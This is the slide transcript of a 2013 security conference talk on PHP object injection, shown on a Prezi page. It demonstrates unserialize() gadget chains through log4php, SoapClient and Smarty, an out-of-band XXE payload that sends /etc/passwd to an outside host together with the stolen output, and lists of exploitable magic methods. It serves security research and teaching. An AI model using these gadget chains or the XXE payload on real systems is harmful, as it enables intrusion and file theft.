Loading presentation...

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

PHP Object Injection Revisited

No description
by

Arseniy Reutov

on 28 May 2013

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of PHP Object Injection Revisited

$ whoami Deserialize bugs in 2013, you kiddin? Actually still alive, just remember Ruby and YAML
(CVE 2013-0156, 0333) What about PHP? Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution (CVE 2012-5692) But... No new concepts since "Shocking news in PHP exploitation" by Stefan Esser (2009) What is actually
PHP Object Injection? class Foo {
public $bar = "baz";
} O:3:"Foo":1:{s:3:"bar";s:3:"baz";} serialize() Vulnerable PHP Web Application object(Foo)#2 (1) {
["bar"]=>
string(3) "baz"
} unserialize() POST / PHP magic methods __construct()
__destruct()
__call()
__callStatic()
__get()
__set()
__isset()
__unset()
__sleep()
__wakeup()
__toString()
__invoke()
__set_state() __clone() PHP Object Injection Revisited me@raz0r.name @ru_raz0r __destruct Is called when object is freed, i.e. on script termination
May contain dangerous code, when deserialized CakePHP <= 1.3.5 / 1.2.8 function __destruct() {
if ($this->__cache) {
$core = App::core('cake');
unset($this->__paths[rtrim($core[0], DS)]);
Cache::write('dir_map', array_filter($this->__paths),'_cake_core_');
Cache::write('file_map', array_filter($this->__map),'_cake_core_');
Cache::write('object_map', $this->__objects, '_cake_core_');
}
} Why only __destruct and web app's classes? vBulletin 5 core
libraries
log4php
examples (no 403!) log4php http://logging.apache.org/log4php/ used by CMS Made Simple , SugarCRM, vtiger, etc
contains handy "examples" dir
vBulletin just cloned the repo leaving examples and did not protect it Examples appender_console.php
appender_dailyfile.php
appender_echo.php
appender_file.php
appender_mailevent.php
appender_mail.php
appender_mongodb.php
appender_null.php
appender_pdo.php
appender_php.php
appender_rollingfile.php
appender_socket.php
appender_socket_server.php
appender_syslog.php
cache.php
configurator_basic.php
configurator_php.php
configurator_xml.php
filter_denyall.php
filter_levelmatch.php
filter_levelrange.php
filter_stringmatch.php
layout_html.php
layout_pattern.php
layout_simple.php
layout_ttcc.php
layout_xml.php
mdc.php
ndc.php
renderer_default.php
renderer_map.php
simple.php
$host = 'localhost';
$port = 4242;
$server = Net_Server::create('sequential', $host, $port);
$handler = new Net_Server_Handler_Log();
$server->setCallbackObject($handler);
$server->start(); class Net_Server_Handler_Log extends Net_Server_Handler {

private $hierarchy;

function onStart() {
$this->hierarchy = Logger::getRootLogger();
}

function onReceiveData($clientId = 0, $data = "") {
$events = $this->getEvents($data);
foreach($events as $event) {
$root = $this->hierarchy->getRootLogger();
if($event->getLoggerName() === 'root') {
$root->callAppenders($event);
} else {
$loggers = $this->hierarchy->getCurrentLoggers();
foreach($loggers as $logger) {
$root->callAppenders($event);
$appenders = $logger->getAllAppenders();
foreach($appenders as $appender) {
$appender->doAppend($event);
}
}
}
}
} function getEvents($data) {
if (preg_match('/^<log4php:event/', $data)) {
throw new Exception("Please use 'log4php.appender.default.useXml = false' in appender_socket.properties file!");
}
preg_match('/^(O:\d+)/', $data, $parts);
$events = split($parts[1], $data);
array_shift($events);
$size = count($events);
for($i=0; $i<$size; $i++) {
$events[$i] = unserialize($parts[1].$events[$i]);
}
return $events;
}
} Let's use PHP classes instead! $classes = get_declared_classes();
foreach($classes as $class) {
$methods = get_class_methods($class);
foreach ($methods as $method) {
if (in_array($method, array(/* magic methods */))) {
print $class . '::' . $method . "\n";
}
}
} Get all the magic methods! Exception::__toString
ErrorException::__toString
DateTime::__wakeup
DOMException::__toString
LogicException::__toString
BadFunctionCallException::__toString
BadMethodCallException::__toString
DomainException::__toString
InvalidArgumentException::__toString
LengthException::__toString
OutOfRangeException::__toString
RuntimeException::__toString
OutOfBoundsException::__toString
OverflowException::__toString
RangeException::__toString
UnderflowException::__toString
UnexpectedValueException::__toString
CachingIterator::__toString
RecursiveCachingIterator::__toString
SplFileInfo::__toString
DirectoryIterator::__toString
FilesystemIterator::__toString
RecursiveDirectoryIterator::__toString
GlobIterator::__toString
SplFileObject::__toString
SplTempFileObject::__toString
ReflectionException::__toString
ReflectionFunctionAbstract::__toString
ReflectionFunction::__toString
ReflectionParameter::__toString
ReflectionMethod::__toString
ReflectionClass::__toString
ReflectionObject::__toString
ReflectionProperty::__toString
ReflectionExtension::__toString
PharException::__toString
Phar::__destruct
Phar::__toString
PharData::__destruct
PharData::__toString
PharFileInfo::__destruct
PharFileInfo::__toString
SimpleXMLElement::__toString
SimpleXMLIterator::__toString
SoapClient::__call
SoapFault::__toString
mysqli_sql_exception::__toString
PDOException::__toString
PDO::__wakeup
PDOStatement::__wakeup __call() is triggered when invoking inaccessible methods in an object context location
uri
style
use
soap_version
login
password
proxy_host
proxy_port
proxy_login
proxy_password
local_cert
passphrase
authentication
compression
encoding
trace
classmap
exceptions
connection_timeout
typemap
type_name
type_ns
from_xml
cache_wsdl
user_agent
stream_context
features
keep_alive Options public SoapClient::SoapClient ( mixed $wsdl [, array $options ] ) WSDL mode Non-WSDL mode WSDL - Web Services Description Language $wsdl = "http://somehost/api.wsdl" Proper serialization is not implemented when SoapClient is initialized in WSDL mode :( $wsdl = null Object survives serialization :) new SoapClient(null, array('location' => 'http://raz0r.name/api.php',
'uri' => 'http://raz0r.name/')); $event = new SoapClient(null, array('location' => 'http://raz0r.name/api.php', 'uri' => 'http://raz0r.name/'));
$event->getLoggerName(); SOAP Call to api.php <?php

header("HTTP/1.0 404 <script>alert(1);</script>"); Fatal error: Uncaught SoapFault exception: [HTTP] <script>alert(1);</script> in appender_socket_server.php:71 SoapClient generates SoapFault exception Does not filter anything open_basedir bypass SoapClient can cache WSDL files locally ini_set('open_basedir', '/var/www/site/');
ini_set('soap.wsdl_cache_enabled', true);
ini_set('soap.wsdl_cache_dir', '/var/www/');
$c = new SoapClient('http://raz0r.name/test.wsdl', array('cache_wsdl' => WSDL_CACHE_DISK)); -rw------- 1 www-data www-data 530 2013-04-17 13:55 wsdl-raz0r-c7c3f5871a779534f433fa6fa878b92c open_basedir restriction in effect? Nope! XSS $c = new SoapClient(null, array('uri'=>'http://raz0r.name/', 'location'=>'http://raz0r.name/xxe.xml'));
$c->getLoggerName(); <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:////etc/passwd">]> Fatal error: Uncaught SoapFault exception: [Client] DTD are not supported by SOAP But if we use Out-of-band technique... <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % a SYSTEM "http://bugsand.hol.es/3_deep?php://filter/read=convert.base64-encode/resource=/etc/passwd">
%a;
%intern;
%trick;
]> GET /result?cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L2Jpbi9zaAptYW46eDo2OjEyOm1hbjovdmFyL2NhY2hlL21hbjovYmluL3NoCmxwOng6Nzo3OmxwOi92YXIvc3Bvb2wvbHBkOi9iaW4vc2gKbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovYmluL3NoCm5ld3M6eDo5Ojk6bmV3czovdmFyL3Nwb29sL25ld3M6L2Jpbi9zaAp1dWNwOng6MTA6MTA6dXVjcDovdmFyL3Nwb29sL3V1Y3A6L2Jpbi9zaApwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L2Jpbi9zaAp3d3ctZGF0YTp4OjMzOjMzOnd3dy1kYXRhOi92YXIvd3d3Oi9iaW4vc2gKYmFja3VwOng6MzQ6MzQ6YmFja3VwOi92YXIvYmFja3VwczovYmluL3NoCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L2Jpbi9zaAppcmM6eDozOTozOTppcmNkOi92YXIvcnVuL2lyY2Q6L2Jpbi9zaApnbmF0czp4OjQxOjQxOkduYXRzIEJ1Zy1SZXBvcnRpbmcgU3lzdGVtIChhZG1pbik6L3Zhci9saWIvZ25hdHM6L2Jpbi9zaApsaWJ1dWlkOng6MTAwOjEwMTo6L3Zhci9saWIvbGlidXVpZDovYmluL3NoCnN5c2xvZzp4OjEwMToxMDM6Oi9ob21lL3N5c2xvZzovYmluL2ZhbHNlCnNzaGQ6eDoxMDI6NjU1MzQ6Oi92YXIvcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4KbGFuZHNjYXBlOng6MTAzOjEwODo6L3Zhci9saWIvbGFuZHNjYXBlOi9iaW4vZmFsc2UKbWVzc2FnZWJ1czp4OjEwNDoxMTI6Oi92YXIvcnVuL2RidXM6L2Jpbi9mYWxzZQpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi9iaW4vc2gKbXlzcWw6eDoxMDU6MTEzOjovdmFyL2xpYi9teXNxbDovYmluL2ZhbHNlCmF2YWhpOng6MTA2OjExNDo6L3Zhci9ydW4vYXZhaGktZGFlbW9uOi9iaW4vZmFsc2UKc25vcnQ6eDoxMDc6MTE1OlNub3J0IElEUzovdmFyL2xvZy9zbm9ydDovYmluL2ZhbHNlCnN0YXRkOng6MTA4OjY1NTM0OjovdmFyL2xpYi9uZnM6L2Jpbi9mYWxzZQp1c2JtdXg6eDoxMDk6NDY6Oi9ob21lL3VzYm11eDovYmluL2ZhbHNlCnB1bHNlOng6MTEwOjExNjo6L3Zhci9ydW4vcHVsc2U6L2Jpbi9mYWxzZQpydGtpdDp4OjExMToxMTc6Oi9wcm9jOi9iaW4vZmFsc2UKZmVzdGl2YWw6eDoxMTI6Mjk6Oi9ob21lL2Zlc3RpdmFsOi9iaW4vZmFsc2UKcG9zdGdyZXM6eDoxMDAwOjEwMDA6Oi9ob21lL3Bvc3RncmVzOi9iaW4vc2gKcmF6MHI6eDoxMDAxOjEwMDE6LCwsOi9ob21lL3JhejByOi9iaW4vYmFzaApoYWxkYWVtb246eDoxMTM6MTIyOkhhcmR3YXJlIGFic3RyYWN0aW9uIGxheWVyLCwsOi92YXIvcnVuL2hhbGQ6L2Jpbi9mYWxzZQptb25nb2RiOng6MTE0OjY1NTM0OjovaG9tZS9tb25nb2RiOi9iaW4vZmFsc2UK
Host: bugsand.hol.es
Connection: close root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false Smarty! public function __destruct()
{
if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
$this->cached->handler->releaseLock($this->smarty, $this->cached);
}
} Smarty_Internal_Template class Smarty {
public $cache_locking = true;
}

class Smarty_Template_Cached {
public $is_locked = true;

public function __construct() {
$this->handler = new SoapClient(null, array(
'uri' =>'http://raz0r.name/',
'location' =>'http://raz0r.name/xxe.xml')
);
}
}

class Smarty_Internal_Template {
public function __construct() {
$this->smarty = new Smarty();
$this->cached = new Smarty_Template_Cached();
}
}

$c = serialize(new Smarty_Internal_Template()); XXE will be triggered automagically! Boring stuff Web application security researcher you have never
heard of Casual CTF player, random bug bounties
participant, bla bla PHP hater since 2006 Some new stuff Some future stuff Joomla! <= 3.0.2 (highlight.php) PHP Object Injection
vulnerability (CVE-2013-1453) CubeCart <= 5.2.0 (cubecart.class.php) PHP Object Injection vulnerability (CVE-2013-1465) all by Egidio Romano But a method is called on unserialized object No useful magic methods in log4php So what? Arseny Reutov XXE Kudos to Alexey Osipov and Timur Yunusov from Positive Technologies What if a PHP framework is implemented
as a PHP extension? Phalcon is a web framework implemented as a C extension
offering high performance and lower resource consumption. The whole Phalcon class userspace is exposed to the users of shared hostings even if they do not use it So we have unserialize... __wakeup() Phalcon\Exception::__toString
Phalcon\DI\Injectable::__get
Phalcon\DI::__call
Phalcon\Forms\Element::__toString
Phalcon\Mvc\View\Engine::__get
Phalcon\Mvc\Model\Exception::__toString
Phalcon\Config::__set_state
Phalcon\DI\FactoryDefault::__call
Phalcon\Cache\Exception::__toString
Phalcon\Tag\Exception::__toString
Phalcon\Paginator\Exception::__toString
Phalcon\Validation::__get
Phalcon\Validation\Message::__toString
Phalcon\Validation\Message::__set_state
Phalcon\Validation\Exception::__toString
Phalcon\Validation\Message\Group::__set_state
Phalcon\Db\Index::__set_state
Phalcon\Db\Column::__set_state
Phalcon\Db\Exception::__toString
Phalcon\Db\Reference::__set_state
Phalcon\Db\RawValue::__toString
Phalcon\Acl\Role::__toString
Phalcon\Acl\Resource::__toString
Phalcon\Acl\Exception::__toString
Phalcon\Security\Exception::__toString
Phalcon\Session\Bag::__set
Phalcon\Session\Bag::__get
Phalcon\Session\Bag::__isset
Phalcon\Session\Bag::__unset
Phalcon\Session\Exception::__toString
Phalcon\DI\Exception::__toString
Phalcon\DI\FactoryDefault\CLI::__call
Phalcon\DI\Service::__set_state
Phalcon\Filter\Exception::__toString
Phalcon\Flash\Exception::__toString
Phalcon\CLI\Task::__get
Phalcon\CLI\Console\Exception::__toString
Phalcon\CLI\Dispatcher\Exception::__toString
Phalcon\CLI\Router\Exception::__toString
Phalcon\Annotations\Exception::__toString
Phalcon\Annotations\Reflection::__set_state
Phalcon\Loader\Exception::__toString
Phalcon\Logger\Exception::__toString
Phalcon\Logger\Adapter\File::__wakeup
Phalcon\Config\Exception::__toString
Phalcon\Config\Adapter\Ini::__set_state
Phalcon\Forms\Form::__get
Phalcon\Forms\Exception::__toString
Phalcon\Forms\Element\File::__toString
Phalcon\Forms\Element\Text::__toString
Phalcon\Forms\Element\Date::__toString
Phalcon\Forms\Element\Hidden::__toString
Phalcon\Forms\Element\Numeric::__toString
Phalcon\Forms\Element\Submit::__toString
Phalcon\Forms\Element\Check::__toString
Phalcon\Forms\Element\Select::__toString
Phalcon\Forms\Element\Password::__toString
Phalcon\Forms\Element\TextArea::__toString
Phalcon\Translate\Exception::__toString
Phalcon\Crypt\Exception::__toString
Phalcon\Escaper\Exception::__toString
Phalcon\Assets\Exception::__toString
Phalcon\Http\Cookie::__toString
Phalcon\Http\Cookie\Exception::__toString
Phalcon\Http\Response\Headers::__set_state
Phalcon\Http\Request\Exception::__toString
Phalcon\Http\Response\Exception::__toString
Phalcon\Mvc\View::__set
Phalcon\Mvc\View::__get
Phalcon\Mvc\Micro::__get
Phalcon\Mvc\Model::__call
Phalcon\Mvc\Model::__callStatic
Phalcon\Mvc\Model::__set
Phalcon\Mvc\Model::__get
Phalcon\Mvc\Model::__isset
Phalcon\Mvc\Application::__get
Phalcon\Mvc\Application\Exception::__toString
Phalcon\Mvc\Controller::__get
Phalcon\Mvc\Collection\Exception::__toString
Phalcon\Mvc\Dispatcher\Exception::__toString
Phalcon\Mvc\Micro\LazyLoader::__call
Phalcon\Mvc\Micro\Exception::__toString
Phalcon\Mvc\Model\Message::__toString
Phalcon\Mvc\Model\Message::__set_state
Phalcon\Mvc\Model\ValidationFailed::__toString
Phalcon\Mvc\Model\Transaction\Failed::__toString
Phalcon\Mvc\Model\Transaction\Exception::__toString
Phalcon\Mvc\Router\Exception::__toString
Phalcon\Mvc\User\Plugin::__get
Phalcon\Mvc\User\Module::__get
Phalcon\Mvc\Url\Exception::__toString
Phalcon\Mvc\User\Component::__get
Phalcon\Mvc\View\Exception::__toString
Phalcon\Mvc\View\Engine\Php::__get
Phalcon\Mvc\View\Engine\Volt::__get
Phalcon\Events\Exception::__toString __wakeup -> fopen -> __toString() Phalcon\Exception::__toString
Phalcon\DI\Injectable::__get
Phalcon\DI::__call
Phalcon\Forms\Element::__toString
Phalcon\Mvc\View\Engine::__get
Phalcon\Mvc\Model\Exception::__toString
Phalcon\Config::__set_state
Phalcon\DI\FactoryDefault::__call
Phalcon\Cache\Exception::__toString
Phalcon\Tag\Exception::__toString
Phalcon\Paginator\Exception::__toString
Phalcon\Validation::__get
Phalcon\Validation\Message::__toString
Phalcon\Validation\Message::__set_state
Phalcon\Validation\Exception::__toString
Phalcon\Validation\Message\Group::__set_state
Phalcon\Db\Index::__set_state
Phalcon\Db\Column::__set_state
Phalcon\Db\Exception::__toString
Phalcon\Db\Reference::__set_state
Phalcon\Db\RawValue::__toString
Phalcon\Acl\Role::__toString
Phalcon\Acl\Resource::__toString
Phalcon\Acl\Exception::__toString
Phalcon\Security\Exception::__toString
Phalcon\Session\Bag::__set
Phalcon\Session\Bag::__get
Phalcon\Session\Bag::__isset
Phalcon\Session\Bag::__unset
Phalcon\Session\Exception::__toString
Phalcon\DI\Exception::__toString
Phalcon\DI\FactoryDefault\CLI::__call
Phalcon\DI\Service::__set_state
Phalcon\Filter\Exception::__toString
Phalcon\Flash\Exception::__toString
Phalcon\CLI\Task::__get
Phalcon\CLI\Console\Exception::__toString
Phalcon\CLI\Dispatcher\Exception::__toString
Phalcon\CLI\Router\Exception::__toString
Phalcon\Annotations\Exception::__toString
Phalcon\Annotations\Reflection::__set_state
Phalcon\Loader\Exception::__toString
Phalcon\Logger\Exception::__toString
Phalcon\Logger\Adapter\File::__wakeup
Phalcon\Config\Exception::__toString
Phalcon\Config\Adapter\Ini::__set_state
Phalcon\Forms\Form::__get
Phalcon\Forms\Exception::__toString
Phalcon\Forms\Element\File::__toString
Phalcon\Forms\Element\Text::__toString
Phalcon\Forms\Element\Date::__toString
Phalcon\Forms\Element\Hidden::__toString
Phalcon\Forms\Element\Numeric::__toString
Phalcon\Forms\Element\Submit::__toString
Phalcon\Forms\Element\Check::__toString
Phalcon\Forms\Element\Select::__toString
Phalcon\Forms\Element\Password::__toString
Phalcon\Forms\Element\TextArea::__toString
Phalcon\Translate\Exception::__toString
Phalcon\Crypt\Exception::__toString
Phalcon\Escaper\Exception::__toString
Phalcon\Assets\Exception::__toString
Phalcon\Http\Cookie::__toString
Phalcon\Http\Cookie\Exception::__toString
Phalcon\Http\Response\Headers::__set_state
Phalcon\Http\Request\Exception::__toString
Phalcon\Http\Response\Exception::__toString
Phalcon\Mvc\View::__set
Phalcon\Mvc\View::__get
Phalcon\Mvc\Micro::__get
Phalcon\Mvc\Model::__call
Phalcon\Mvc\Model::__callStatic
Phalcon\Mvc\Model::__set
Phalcon\Mvc\Model::__get
Phalcon\Mvc\Model::__isset
Phalcon\Mvc\Application::__get
Phalcon\Mvc\Application\Exception::__toString
Phalcon\Mvc\Controller::__get
Phalcon\Mvc\Collection\Exception::__toString
Phalcon\Mvc\Dispatcher\Exception::__toString
Phalcon\Mvc\Micro\LazyLoader::__call
Phalcon\Mvc\Micro\Exception::__toString
Phalcon\Mvc\Model\Message::__toString
Phalcon\Mvc\Model\Message::__set_state
Phalcon\Mvc\Model\ValidationFailed::__toString
Phalcon\Mvc\Model\Transaction\Failed::__toString
Phalcon\Mvc\Model\Transaction\Exception::__toString
Phalcon\Mvc\Router\Exception::__toString
Phalcon\Mvc\User\Plugin::__get
Phalcon\Mvc\User\Module::__get
Phalcon\Mvc\Url\Exception::__toString
Phalcon\Mvc\User\Component::__get
Phalcon\Mvc\View\Exception::__toString
Phalcon\Mvc\View\Engine\Php::__get
Phalcon\Mvc\View\Engine\Volt::__get
Phalcon\Events\Exception::__toString do not unserialize user-supplied data! So... Thanks! Questions? me@raz0r.name @ru_raz0r Arseny Reutov init any class and execute arbitrary methods
Full transcript